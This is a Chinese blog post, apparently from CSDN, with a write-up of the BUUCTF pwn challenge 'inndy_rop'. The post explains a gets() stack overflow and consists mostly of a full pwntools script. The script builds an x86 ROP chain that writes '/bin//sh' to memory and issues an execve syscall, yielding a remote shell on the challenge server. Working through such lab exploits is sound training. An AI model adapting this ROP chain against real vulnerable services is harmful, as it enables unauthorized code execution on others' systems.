[BUUCTF-pwn]——inndy_rop-优快云博客

本文介绍了一个名为inndy_rop的CTF题目解决方案，通过栈溢出漏洞利用并构造ROP链实现远程代码执行。文章详细展示了如何使用特定的gadget来构建所需的环境，最终成功执行/bin//sh命令。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

[BUUCTF-pwn]——inndy_rop

main函数无法反汇编，不过还好，里面的overflow就是gets函数，可以栈溢出。

在这里插入图片描述

因为懒得自己去构造rop链了，看看里面是否可以拼凑出系统的调用
在这里插入图片描述
里面有就省的我们自己写了

中间还找了半天错，我真是个笨蛋，以前一直用p 忘记和和构造系统调用的变量重复了，改为a就好了

exploit

from pwn import *
from struct import pack
a = remote('node3.buuoj.cn',27139)
# Padding goes here
p = 'a' * (0xc + 4)

p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80

payload =  p
a.sendline(payload)
a.interactive()